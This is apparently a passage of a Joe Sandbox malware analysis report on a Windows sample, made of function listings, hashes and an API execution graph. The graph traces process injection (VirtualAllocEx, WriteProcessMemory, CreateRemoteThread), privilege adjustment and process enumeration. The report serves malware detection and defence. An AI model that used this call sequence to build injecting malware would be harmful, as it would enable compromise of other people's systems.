                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID: first Window app$oloooool
                                                                  • API String ID: 716092398-2688301056
                                                                  • Opcode ID: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction ID: 6bf7e3dfdf983de485033f2134917db6cee18bc32def7ed793967fc69823b713
                                                                  • Opcode Fuzzy Hash: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction Fuzzy Hash: C2F0AFB2704259BFDB94DE9DDC85E9B77ECEB8C2A0B004129BA0CD7241D630ED108BB4
                                                                  Function 006019D0 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
                                                                  • EnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
                                                                  • LeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID:
                                                                  • API String ID: 730355536-0
                                                                  • Opcode ID: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction ID: 74df882c1a01e5d4aec3e25528a86efcb18e16bd6ea950092898227c461be41d
                                                                  • Opcode Fuzzy Hash: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction Fuzzy Hash: 671160B0AC4241AFD75DEF99CC15B5BBBE3DB4A300F14E4A9A1009B3D1C7754D418B58
                                                                  Function 00402664 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402671
                                                                  • InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402679
                                                                  • InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402681
                                                                  • InitializeCriticalSection.KERNEL32(?,00402201,?,00401836), ref: 00402689
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection
                                                                  • String ID:
                                                                  • API String ID: 32694325-0
                                                                  • Opcode ID: cf65fcc1aeab1ef7e16435afcb5f7beaf118cbbb08b94427fa8083d0bb468be8
                                                                  • Instruction ID: 48065476d1b059bde1b2936bcb0e38e24f7665c16bd3e9ed4f641355b81c547b
                                                                  • Opcode Fuzzy Hash: cf65fcc1aeab1ef7e16435afcb5f7beaf118cbbb08b94427fa8083d0bb468be8
                                                                  • Instruction Fuzzy Hash: 16C0E931A070249ACB513B75FE0484A3E25EB0426031640BAA5096203486331830DFD8

                                                                  Execution Graph

                                                                  Execution Coverage:4.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:9.8%
                                                                  Total number of Nodes:737
                                                                  Total number of Limit Nodes:24
                                                                  execution_graph 13063 405f09 13064 405f10 13063->13064 13065 405fe4 13064->13065 13069 405ffc 13064->13069 13067 4056e0 22 API calls 13065->13067 13066 406033 13070 405fed 13067->13070 13068 406010 13072 405820 39 API calls 13068->13072 13069->13066 13069->13068 13071 4056e0 22 API calls 13069->13071 13071->13068 13072->13068 10242 410910 memset 10277 40a5d0 10242->10277 10244 41093d GetProcessHeap memset GetModuleFileNameA 10245 41098c 10244->10245 10246 4109cf GetTickCount 10244->10246 10279 40f2b0 10245->10279 10248 4109db 10246->10248 10251 4109f3 Sleep OpenMutexA 10248->10251 10249 4109a7 10249->10246 10250 4109ae ShellExecuteA 10249->10250 10250->10246 10252 410a21 GetLastError 10251->10252 10253 410a38 lstrlenA 10251->10253 10252->10253 10254 410a2e GetLastError ExitProcess 10252->10254 10288 401e60 10253->10288 10258 410a71 10259 410a78 ExitProcess 10258->10259 10260 410a7f 10258->10260 10318 4073e0 memset memset 10260->10318 10262 410a8e 10263 410a96 ExitProcess 10262->10263 10264 410a9e 10262->10264 10330 407330 memset 10264->10330 10268 410ab4 10347 406850 SHGetSpecialFolderPathW 10268->10347 10270 410abe GetModuleFileNameW wsprintfW WideCharToMultiByte lstrcpynW WideCharToMultiByte 10271 410b4a 10270->10271 10272 410b5f 10270->10272 10348 40a990 10271->10348 10355 405ce0 10272->10355 10275 410b4f Sleep 10275->10272 10276 410b6b ExitProcess 10278 40a5e5 10277->10278 10278->10244 10369 403810 GetProcessHeap RtlAllocateHeap 10279->10369 10281 40f2ca 10282 40f2d3 10281->10282 10283 40f2db sprintf CreateFileA 10281->10283 10282->10249 10284 40f307 memset DeviceIoControl CloseHandle 10283->10284 10285 40f365 10283->10285 10284->10285 10370 4037f0 GetProcessHeap HeapFree 10285->10370 10287 40f37b 10287->10249 10289 401e6f _snprintf 10288->10289 10290 404d00 10289->10290 10292 404d0e 10290->10292 10291 404d16 10291->10258 10292->10291 10371 403a20 10292->10371 10294 404d33 10295 404d37 10294->10295 10296 404d3d GetVersionExA 10294->10296 10295->10258 10296->10295 10297 404d56 10296->10297 10376 403f90 10297->10376 10299 404d5c 10386 403390 10299->10386 10301 404d7e 10395 404ae0 10301->10395 10303 404d9b 10417 403ac0 10303->10417 10305 404da6 strncpy 10421 4035d0 10305->10421 10307 404dd0 NtQueryInformationProcess 10308 404e53 10307->10308 10309 404ddc 10307->10309 10422 403890 10308->10422 10443 403440 10309->10443 10312 404e67 10430 403750 10312->10430 10314 404dee 10314->10308 10315 404e6d 10434 404c20 10315->10434 10317 404e7e 10317->10258 10319 407430 lstrlenA 10318->10319 10320 407453 _vsnprintf lstrlenA 10318->10320 10319->10320 10321 407437 _snprintf 10319->10321 10513 404900 10320->10513 10321->10320 10323 407495 10324 4074a8 _memicmp 10323->10324 10325 40749c 10323->10325 10326 4074bc _vsnprintf 10324->10326 10327 4074ee 10324->10327 10325->10262 10528 40a310 10326->10528 10327->10262 10329 4074eb 10329->10327 10331 407368 lstrlenA 10330->10331 10332 40738b _vsnprintf lstrlenA 10330->10332 10331->10332 10333 40736f _snprintf 10331->10333 10539 4049f0 10332->10539 10333->10332 10335 4073cc 10336 40b300 GetProcessHeap HeapAlloc memset memset 10335->10336 10337 40b360 10336->10337 10338 40b37b GetWindowsDirectoryW 10336->10338 10337->10268 10338->10337 10339 40b391 lstrcpynW GetVolumeInformationW 10338->10339 10340 40b3c5 10339->10340 10341 40b3cc lstrlenA 10339->10341 10340->10341 10342 40b3f6 10341->10342 10343 40b3de 10341->10343 10345 40b467 10342->10345 10346 40b45b lstrcatW 10342->10346 10344 40b3e0 lstrlenA 10343->10344 10344->10342 10344->10344 10345->10268 10346->10345 10347->10270 10349 40a9a5 10348->10349 10565 4068b0 SHGetSpecialFolderPathW 10349->10565 10351 40a9cd 10352 40a9d1 10351->10352 10353 40a9d6 CreateProcessW 10351->10353 10352->10275 10354 40a9f7 10353->10354 10354->10275 10356 406033 10355->10356 10357 405cf3 10355->10357 10356->10276 10357->10356 10358 405d55 10357->10358 10359 405f86 10357->10359 10360 403440 10 API calls 10358->10360 10361 405fe4 10359->10361 10362 405ffc 10359->10362 10368 405d60 10360->10368 10363 4056e0 22 API calls 10361->10363 10362->10356 10364 406010 10362->10364 10568 4056e0 10362->10568 10365 405fed 10363->10365 10364->10276 10582 405820 memset 10364->10582 10365->10276 10368->10359 10369->10281 10370->10287 10373 403a25 10371->10373 10372 403a2d 10372->10294 10373->10372 10462 4035b0 GetPEB 10373->10462 10375 403a44 10375->10294 10377 403fa6 10376->10377 10378 403f9f 10376->10378 10380 404018 10377->10380 10381 403890 3 API calls 10377->10381 10379 403890 3 API calls 10378->10379 10379->10377 10380->10299 10382 403fd1 10381->10382 10383 403750 2 API calls 10382->10383 10384 403fd7 10383->10384 10384->10380 10385 404003 GetNativeSystemInfo 10384->10385 10385->10380 10387 4033a0 10386->10387 10388 40339b 10386->10388 10463 4030c0 10387->10463 10388->10301 10391 4030c0 RtlInitializeCriticalSection 10393 4033c3 10391->10393 10392 40342e 10392->10301 10393->10392 10467 4031d0 10393->10467 10396 404af2 10395->10396 10397 404b54 10395->10397 10396->10397 10398 404b0d strncpy sprintf CreateMutexA 10396->10398 10397->10303 10399 404b4b 10398->10399 10400 404b5c _snprintf OpenFileMappingA 10398->10400 10482 404880 10399->10482 10402 404b96 CloseHandle 10400->10402 10403 404b9d 10400->10403 10402->10403 10405 404bad 10403->10405 10474 404560 10403->10474 10404 404b51 10404->10397 10409 404bd1 10405->10409 10491 404470 10405->10491 10408 404bbc 10410 404bc8 10408->10410 10411 404bda 10408->10411 10409->10303 10412 404880 3 API calls 10410->10412 10413 404c08 10411->10413 10414 404bde WaitForSingleObject 10411->10414 10415 404bce 10412->10415 10413->10303 10414->10413 10416 404bed ReleaseMutex 10414->10416 10415->10409 10416->10413 10418 403b10 10417->10418 10419 403acc 10417->10419 10418->10305 10419->10418 10420 403ae0 _snprintf 10419->10420 10420->10305 10421->10307 10423 4038a0 10422->10423 10424 4038ae 10422->10424 10497 4035b0 GetPEB 10423->10497 10427 4038c0 RtlAnsiStringToUnicodeString 10424->10427 10426 4038a5 10426->10312 10428 4038f6 LdrGetDllHandle 10427->10428 10429 4038ee 10427->10429 10428->10312 10429->10312 10431 403760 LdrGetProcedureAddress 10430->10431 10432 403784 LdrGetProcedureAddress 10430->10432 10431->10315 10432->10315 10498 4035d0 10434->10498 10436 404c31 OpenProcessToken 10437 404c48 LookupPrivilegeValueA 10436->10437 10438 404c3c GetLastError 10436->10438 10439 404c72 AdjustTokenPrivileges 10437->10439 10440 404c5c GetLastError CloseHandle 10437->10440 10438->10317 10441 404ca3 GetLastError 10439->10441 10442 404ca9 CloseHandle 10439->10442 10440->10317 10441->10442 10442->10317 10444 40359f 10443->10444 10450 403451 10443->10450 10444->10314 10445 40348c printf printf 10447 4034c2 10445->10447 10448 4034c7 printf 10445->10448 10447->10448 10499 4035d0 10448->10499 10449 40355a 10451 403593 10449->10451 10507 403320 10449->10507 10450->10444 10450->10445 10450->10449 10451->10314 10454 4034f1 NtAllocateVirtualMemory 10454->10444 10457 403500 10454->10457 10456 4031d0 2 API calls 10456->10451 10457->10444 10500 403100 10457->10500 10459 40354a 10460 403440 6 API calls 10459->10460 10461 403551 10460->10461 10461->10314 10462->10375 10464 4030f1 10463->10464 10465 4030cb 10463->10465 10464->10391 10465->10464 10466 4030e7 RtlInitializeCriticalSection 10465->10466 10466->10464 10468 403230 10467->10468 10469 4031dc 10467->10469 10468->10392 10469->10468 10470 4031e9 EnterCriticalSection 10469->10470 10471 4031f3 10469->10471 10470->10471 10472 403227 10471->10472 10473 40321d LeaveCriticalSection 10471->10473 10472->10392 10473->10472 10477 40457a 10474->10477 10475 4046fd 10475->10405 10476 404470 4 API calls 10476->10477 10477->10475 10477->10476 10478 4045b9 _snprintf 10477->10478 10479 4045ed CreateFileMappingA 10477->10479 10478->10477 10478->10479 10479->10475 10480 404621 MapViewOfFile 10479->10480 10480->10477 10481 404706 CloseHandle 10480->10481 10481->10405 10483 404890 10482->10483 10484 40488b 10482->10484 10485 4048a4 10483->10485 10486 404897 CloseHandle 10483->10486 10484->10404 10487 4048b7 UnmapViewOfFile 10485->10487 10488 4048cc 10485->10488 10486->10485 10487->10485 10489 4048da CloseHandle 10488->10489 10490 4048ef 10488->10490 10489->10488 10490->10404 10492 404536 10491->10492 10493 40448e _snprintf OpenFileMappingA 10491->10493 10492->10408 10494 404530 10493->10494 10495 4044e2 MapViewOfFile 10493->10495 10494->10408 10495->10492 10496 404516 CloseHandle 10495->10496 10496->10494 10497->10426 10498->10436 10499->10454 10501 403161 10500->10501 10502 40310c 10500->10502 10501->10459 10502->10501 10503 403119 EnterCriticalSection 10502->10503 10504 403123 10502->10504 10503->10504 10505 403158 10504->10505 10506 40314e LeaveCriticalSection 10504->10506 10505->10459 10506->10505 10508 403332 10507->10508 10509 403385 10507->10509 10508->10509 10510 40333c EnterCriticalSection 10508->10510 10511 403346 10508->10511 10509->10456 10510->10511 10511->10509 10512 40337b LeaveCriticalSection 10511->10512 10512->10509 10514 4049df 10513->10514 10516 404910 10513->10516 10514->10323 10515 404933 WaitForSingleObject 10517 404982 10515->10517 10521 404943 10515->10521 10516->10514 10516->10515 10517->10323 10518 404979 ReleaseMutex 10518->10517 10519 404470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 10519->10521 10520 4049b2 10523 404470 4 API calls 10520->10523 10521->10517 10521->10518 10521->10519 10521->10520 10522 4049a2 ReleaseMutex 10521->10522 10522->10323 10524 4049b7 10523->10524 10525 404470 4 API calls 10524->10525 10526 4049c1 ReleaseMutex 10525->10526 10526->10323 10537 410f10 10528->10537 10531 401e60 10532 40a3ba _snprintf lstrlenA sprintf lstrlenA lstrlenA 10531->10532 10533 40a419 10532->10533 10534 40a431 EnterCriticalSection CreateFileA 10533->10534 10535 40a473 WriteFile CloseHandle Sleep LeaveCriticalSection 10534->10535 10536 40a45f LeaveCriticalSection 10534->10536 10535->10329 10536->10329 10538 40a31d 6 API calls 10537->10538 10538->10531 10540 404a00 10539->10540 10541 404acb 10539->10541 10540->10541 10542 404a0b WaitForSingleObject 10540->10542 10541->10335 10542->10541 10543 404a1e 10542->10543 10544 404560 8 API calls 10543->10544 10547 404a42 10544->10547 10545 404a79 10545->10335 10546 404aad ReleaseMutex 10550 404470 4 API calls 10546->10550 10547->10545 10547->10546 10557 4047c0 10547->10557 10552 404ac6 10550->10552 10551 404a6d 10553 404a80 10551->10553 10554 404a74 ReleaseMutex 10551->10554 10552->10335 10555 404470 4 API calls 10553->10555 10554->10545 10556 404a88 ReleaseMutex 10555->10556 10556->10546 10558 4047d1 10557->10558 10559 404875 10557->10559 10558->10559 10560 4047ed InterlockedIncrement 10558->10560 10559->10551 10564 404807 10560->10564 10561 40485c 10561->10551 10562 404470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 10562->10564 10563 404560 8 API calls 10563->10564 10564->10561 10564->10562 10564->10563 10566 4068c5 10565->10566 10567 4068c6 PathAppendW 10565->10567 10566->10351 10567->10351 10569 4056ef 10568->10569 10570 4056f5 10568->10570 10569->10364 10593 402cd0 10570->10593 10572 405730 NtQuerySystemInformation 10576 405795 10572->10576 10578 40574b 10572->10578 10573 4057ff 10609 402ca0 10573->10609 10574 405815 10574->10364 10575 402cd0 4 API calls 10575->10578 10576->10573 10601 404410 10576->10601 10578->10574 10578->10575 10581 40577d NtQuerySystemInformation 10578->10581 10580 405808 10580->10364 10581->10576 10581->10578 10584 405882 10582->10584 10583 405a04 CloseHandle 10583->10364 10584->10583 10585 4058b8 CloseHandle 10584->10585 10586 4058bf NtQueryInformationProcess 10584->10586 10587 4059f7 Sleep 10584->10587 10588 4058eb NtQueryInformationProcess 10584->10588 10589 404900 8 API calls 10584->10589 10590 4049f0 13 API calls 10584->10590 10591 40596b InterlockedCompareExchange 10584->10591 10592 4042e0 15 API calls 10584->10592 10585->10586 10586->10584 10587->10584 10588->10584 10589->10584 10590->10584 10591->10584 10592->10584 10594 402ce4 10593->10594 10595 402cde 10593->10595 10596 402d00 10594->10596 10597 402d3b 10594->10597 10600 402d08 10594->10600 10595->10572 10619 403810 GetProcessHeap RtlAllocateHeap 10596->10619 10614 403830 10597->10614 10600->10572 10602 404418 10601->10602 10603 404420 10602->10603 10604 404424 OpenProcess 10602->10604 10603->10576 10605 404447 10604->10605 10606 40443c GetLastError 10604->10606 10621 4042e0 10605->10621 10606->10576 10608 404456 CloseHandle 10608->10576 10610 402caa 10609->10610 10611 402cac 10609->10611 10610->10580 10613 402cbe 10611->10613 10670 4037f0 GetProcessHeap HeapFree 10611->10670 10613->10580 10615 403848 GetProcessHeap HeapReAlloc 10614->10615 10616 40383a 10614->10616 10615->10600 10620 403810 GetProcessHeap RtlAllocateHeap 10616->10620 10618 403843 10618->10600 10619->10600 10620->10618 10622 4042eb 10621->10622 10623 4042f3 10622->10623 10644 4042a0 10622->10644 10623->10608 10626 404310 10626->10608 10627 404323 VirtualAllocEx 10628 40433a 10627->10628 10629 40439f GetLastError 10627->10629 10630 404341 WriteProcessMemory 10628->10630 10631 404356 10628->10631 10633 4043ba 10629->10633 10634 4043af VirtualFreeEx 10629->10634 10630->10629 10630->10631 10631->10629 10647 404160 10631->10647 10635 4043c1 VirtualFreeEx 10633->10635 10636 4043cc 10633->10636 10634->10633 10635->10636 10636->10608 10637 404374 10637->10629 10638 40437e CreateRemoteThread 10637->10638 10638->10629 10639 4043d5 10638->10639 10662 4037f0 GetProcessHeap HeapFree 10639->10662 10641 4043dc 10642 4043f4 CloseHandle 10641->10642 10643 4043e6 10641->10643 10642->10608 10643->10608 10645 4042ad IsWow64Process 10644->10645 10646 4042bf 10644->10646 10645->10646 10646->10626 10646->10627 10646->10628 10663 404020 10647->10663 10649 40417f VirtualAllocEx 10650 4041a5 10649->10650 10651 40428c 10649->10651 10652 404020 2 API calls 10650->10652 10651->10637 10655 4041b4 10652->10655 10653 404270 VirtualFreeEx 10653->10651 10654 404286 10653->10654 10668 4037f0 GetProcessHeap HeapFree 10654->10668 10655->10653 10657 404241 WriteProcessMemory 10655->10657 10657->10653 10658 404259 10657->10658 10658->10653 10659 40425e 10658->10659 10667 4037f0 GetProcessHeap HeapFree 10659->10667 10661 404264 10661->10637 10662->10641 10664 404040 10663->10664 10666 404046 10663->10666 10669 403810 GetProcessHeap RtlAllocateHeap 10664->10669 10666->10649 10667->10661 10668->10651 10669->10666 10670->10613 10671 365c50 10679 365a20 10671->10679 10673 365c67 10674 365c7f NtQueryInformationProcess 10673->10674 10675 365cd8 10674->10675 10676 365c8a 10674->10676 10696 3649f0 10676->10696 10678 365cc6 10680 365a2b 10679->10680 10681 365c46 10680->10681 10714 363a20 10680->10714 10681->10673 10683 365ae5 10719 364d00 10683->10719 10685 365aef LdrEnumerateLoadedModules 10755 363080 10685->10755 10688 365b31 10689 363080 9 API calls 10688->10689 10692 365b4f 10689->10692 10690 365a3c 10690->10681 10690->10683 10746 363920 10690->10746 10751 363750 10690->10751 10691 365bf4 CreateThread CloseHandle 10695 365c0c 10691->10695 10911 365070 _snprintf CreateMutexA WaitForSingleObject 10691->10911 10692->10691 10692->10695 10693 365c2e CreateThread CloseHandle 10693->10681 10915 3650f0 _snprintf CreateMutexA WaitForSingleObject 10693->10915 10695->10681 10695->10693 10697 364a00 10696->10697 10698 364acb 10696->10698 10697->10698 10699 364a0b WaitForSingleObject 10697->10699 10698->10678 10699->10698 10700 364a1e 10699->10700 10701 364560 8 API calls 10700->10701 10704 364a42 10701->10704 10702 364a79 10702->10678 10703 364aad ReleaseMutex 10707 364470 4 API calls 10703->10707 10704->10702 10704->10703 11087 3647c0 10704->11087 10709 364ac6 10707->10709 10708 364a6d 10710 364a74 ReleaseMutex 10708->10710 10711 364a80 10708->10711 10709->10678 10710->10702 10712 364470 4 API calls 10711->10712 10713 364a88 ReleaseMutex 10712->10713 10713->10703 10716 363a25 10714->10716 10715 363a2d 10715->10690 10716->10715 10763 3635b0 GetPEB 10716->10763 10718 363a44 10718->10690 10720 364d0e 10719->10720 10721 364d16 10720->10721 10722 363a20 GetPEB 10720->10722 10721->10685 10723 364d33 10722->10723 10724 364d37 10723->10724 10725 364d3d GetVersionExA 10723->10725 10724->10685 10725->10724 10726 364d56 10725->10726 10764 363f90 10726->10764 10728 364d5c 10774 363390 10728->10774 10730 364d7e 10783 364ae0 10730->10783 10732 364d9b 10807 363ac0 10732->10807 10734 364da6 strncpy 10811 3635d0 10734->10811 10736 364dd0 NtQueryInformationProcess 10737 364dee 10736->10737 10738 364ddc 10736->10738 10831 363890 10737->10831 10812 363440 10738->10812 10741 364e67 10742 363750 2 API calls 10741->10742 10743 364e6d 10742->10743 10839 364c20 10743->10839 10745 364e7e 10745->10685 10898 363670 10746->10898 10749 363974 LdrLoadDll 10749->10690 10750 36396c 10750->10690 10752 363784 LdrGetProcedureAddress 10751->10752 10753 363760 LdrGetProcedureAddress 10751->10753 10752->10690 10753->10690 10756 363890 3 API calls 10755->10756 10757 36308c 10756->10757 10758 3630bb 10757->10758 10759 363750 2 API calls 10757->10759 10758->10688 10760 36309a 10759->10760 10760->10758 10900 362f90 10760->10900 10762 3630b6 10762->10688 10763->10718 10765 363f9f 10764->10765 10768 363fa6 10764->10768 10766 363890 3 API calls 10765->10766 10766->10768 10767 364018 10767->10728 10768->10767 10769 363890 3 API calls 10768->10769 10770 363fd1 10769->10770 10771 363750 2 API calls 10770->10771 10772 363fd7 10771->10772 10772->10767 10773 364003 GetNativeSystemInfo 10772->10773 10773->10767 10775 3633a0 10774->10775 10776 36339b 10774->10776 10848 3630c0 10775->10848 10776->10730 10779 3630c0 InitializeCriticalSection 10780 3633c3 10779->10780 10782 36342e 10780->10782 10852 3631d0 10780->10852 10782->10730 10784 364b54 10783->10784 10785 364af2 10783->10785 10784->10732 10785->10784 10786 364b0d strncpy sprintf CreateMutexA 10785->10786 10787 364b5c _snprintf OpenFileMappingA 10786->10787 10788 364b4b 10786->10788 10789 364b96 CloseHandle 10787->10789 10790 364b9d 10787->10790 10865 364880 10788->10865 10789->10790 10793 364bb4 10790->10793 10794 364ba1 10790->10794 10792 364b51 10792->10784 10859 364470 10793->10859 10874 364560 10794->10874 10797 364bad 10797->10793 10799 364bd1 10797->10799 10798 364bbc 10800 364bda 10798->10800 10801 364bc8 10798->10801 10799->10732 10802 364bde WaitForSingleObject 10800->10802 10803 364c08 10800->10803 10804 364880 3 API calls 10801->10804 10802->10803 10805 364bed ReleaseMutex 10802->10805 10803->10732 10806 364bce 10804->10806 10805->10803 10806->10799 10808 363b10 10807->10808 10809 363acc 10807->10809 10808->10734 10809->10808 10810 363ae0 _snprintf 10809->10810 10810->10734 10811->10736 10813 36359f 10812->10813 10819 363451 10812->10819 10813->10737 10814 36348c printf printf 10817 3634c7 printf 10814->10817 10818 3634c2 10814->10818 10816 36355a 10820 363593 10816->10820 10890 363320 10816->10890 10882 3635d0 10817->10882 10818->10817 10819->10813 10819->10814 10819->10816 10820->10737 10823 3634f1 NtAllocateVirtualMemory 10823->10813 10826 363500 10823->10826 10825 3631d0 2 API calls 10825->10820 10826->10813 10883 363100 10826->10883 10828 36354a 10829 363440 6 API calls 10828->10829 10830 363551 10829->10830 10830->10737 10832 3638a0 10831->10832 10833 3638ae 10831->10833 10896 3635b0 GetPEB 10832->10896 10835 3638c0 RtlAnsiStringToUnicodeString 10833->10835 10837 3638f6 LdrGetDllHandle 10835->10837 10838 3638ee 10835->10838 10836 3638a5 10836->10741 10837->10741 10838->10741 10897 3635d0 10839->10897 10841 364c31 OpenProcessToken 10842 364c3c GetLastError 10841->10842 10843 364c48 LookupPrivilegeValueA 10841->10843 10842->10745 10844 364c72 AdjustTokenPrivileges 10843->10844 10845 364c5c GetLastError CloseHandle 10843->10845 10846 364ca3 GetLastError 10844->10846 10847 364ca9 CloseHandle 10844->10847 10845->10745 10846->10847 10847->10745 10849 3630f1 10848->10849 10850 3630cb 10848->10850 10849->10779 10850->10849 10851 3630e7 InitializeCriticalSection 10850->10851 10851->10849 10853 363230 10852->10853 10854 3631dc 10852->10854 10853->10782 10854->10853 10855 3631f3 10854->10855 10856 3631e9 EnterCriticalSection 10854->10856 10857 363227 10855->10857 10858 36321d LeaveCriticalSection 10855->10858 10856->10855 10857->10782 10858->10857 10860 364536 10859->10860 10861 36448e _snprintf OpenFileMappingA 10859->10861 10860->10798 10862 3644e2 MapViewOfFile 10861->10862 10863 364530 10861->10863 10862->10860 10864 364516 CloseHandle 10862->10864 10863->10798 10864->10863 10866 364890 10865->10866 10867 36488b 10865->10867 10868 364897 CloseHandle 10866->10868 10869 3648a4 10866->10869 10867->10792 10868->10869 10870 3648b7 UnmapViewOfFile 10869->10870 10871 3648cc 10869->10871 10870->10869 10872 3648da CloseHandle 10871->10872 10873 3648ef 10871->10873 10872->10871 10873->10792 10881 36457a 10874->10881 10875 3646fd 10875->10797 10876 364470 4 API calls 10876->10881 10877 3645b9 _snprintf 10878 3645ed CreateFileMappingA 10877->10878 10877->10881 10878->10875 10879 364621 MapViewOfFile 10878->10879 10880 364706 CloseHandle 10879->10880 10879->10881 10880->10797 10881->10875 10881->10876 10881->10877 10881->10878 10882->10823 10884 363161 10883->10884 10885 36310c 10883->10885 10884->10828 10885->10884 10886 363123 10885->10886 10887 363119 EnterCriticalSection 10885->10887 10888 36314e LeaveCriticalSection 10886->10888 10889 363158 10886->10889 10887->10886 10888->10889 10889->10828 10891 363385 10890->10891 10892 363332 10890->10892 10891->10825 10892->10891 10893 36333c EnterCriticalSection 10892->10893 10894 363346 10892->10894 10893->10894 10894->10891 10895 36337b LeaveCriticalSection 10894->10895 10895->10891 10896->10836 10897->10841 10899 36367c RtlAnsiStringToUnicodeString 10898->10899 10899->10749 10899->10750 10901 363074 10900->10901 10902 362fa2 10900->10902 10901->10762 10902->10901 10903 362fc2 ReadProcessMemory 10902->10903 10904 362fe0 10903->10904 10910 363059 10903->10910 10905 363004 WriteProcessMemory 10904->10905 10904->10910 10906 363022 10905->10906 10905->10910 10907 363028 WriteProcessMemory 10906->10907 10906->10910 10908 36303c 10907->10908 10907->10910 10909 363044 WriteProcessMemory 10908->10909 10908->10910 10909->10910 10910->10762 10912 3650b5 10911->10912 10914 3650d8 10912->10914 10927 365ce0 10912->10927 10917 365135 10915->10917 10916 36520e 10917->10916 10918 363ac0 _snprintf 10917->10918 10919 36516d 10918->10919 11057 363b90 10919->11057 10921 365182 11067 363c90 10921->11067 10923 365202 11082 363b20 10923->11082 10925 3651b5 10925->10923 10926 363c90 11 API calls 10925->10926 10926->10925 10928 366033 10927->10928 10929 365cf3 10927->10929 10928->10914 10929->10928 10930 363440 10 API calls 10929->10930 10938 365d60 10929->10938 10930->10938 10931 365fe4 10939 3656e0 10931->10939 10932 365ffc 10932->10928 10935 366010 10932->10935 10937 3656e0 22 API calls 10932->10937 10934 365fed 10934->10914 10935->10914 10953 365820 memset 10935->10953 10937->10935 10938->10931 10938->10932 10940 3656f5 10939->10940 10941 3656ef 10939->10941 10964 362cd0 10940->10964 10941->10934 10943 365730 NtQuerySystemInformation 10944 365795 10943->10944 10950 36574b 10943->10950 10945 3657ff 10944->10945 10972 364410 10944->10972 10980 362ca0 10945->10980 10946 365815 10946->10934 10947 362cd0 4 API calls 10947->10950 10950->10946 10950->10947 10951 36577d NtQuerySystemInformation 10950->10951 10951->10944 10951->10950 10952 365808 10952->10934 10960 365882 10953->10960 10954 365a04 CloseHandle 10954->10935 10955 3658bf NtQueryInformationProcess 10955->10960 10956 3658b8 CloseHandle 10956->10955 10957 3659f7 Sleep 10957->10960 10958 3658eb NtQueryInformationProcess 10958->10960 10960->10954 10960->10955 10960->10956 10960->10957 10960->10958 10961 3649f0 13 API calls 10960->10961 10962 36596b InterlockedCompareExchange 10960->10962 10963 3642e0 15 API calls 10960->10963 11042 364900 10960->11042 10961->10960 10962->10960 10963->10960 10965 362ce4 10964->10965 10966 362cde 10964->10966 10967 362d00 10965->10967 10968 362d3b 10965->10968 10971 362d08 10965->10971 10966->10943 10985 363810 GetProcessHeap HeapAlloc 10967->10985 10986 363830 10968->10986 10971->10943 10973 364418 10972->10973 10974 364424 OpenProcess 10973->10974 10975 364420 10973->10975 10976 364447 10974->10976 10977 36443c GetLastError 10974->10977 10975->10944 10992 3642e0 10976->10992 10977->10944 10979 364456 CloseHandle 10979->10944 10981 362cac 10980->10981 10982 362caa 10980->10982 10983 362cbe 10981->10983 11041 3637f0 GetProcessHeap HeapFree 10981->11041 10982->10952 10983->10952 10985->10971 10987 36383a 10986->10987 10988 363848 GetProcessHeap HeapReAlloc 10986->10988 10991 363810 GetProcessHeap HeapAlloc 10987->10991 10988->10971 10990 363843 10990->10971 10991->10990 10993 3642eb 10992->10993 10994 3642f3 10993->10994 11015 3642a0 10993->11015 10994->10979 10997 364310 10997->10979 10998 364323 VirtualAllocEx 10999 36433a 10998->10999 11000 36439f GetLastError 10998->11000 11001 364341 WriteProcessMemory 10999->11001 11002 364356 10999->11002 11003 3643af VirtualFreeEx 11000->11003 11004 3643ba 11000->11004 11001->11000 11001->11002 11002->11000 11018 364160 11002->11018 11003->11004 11007 3643c1 VirtualFreeEx 11004->11007 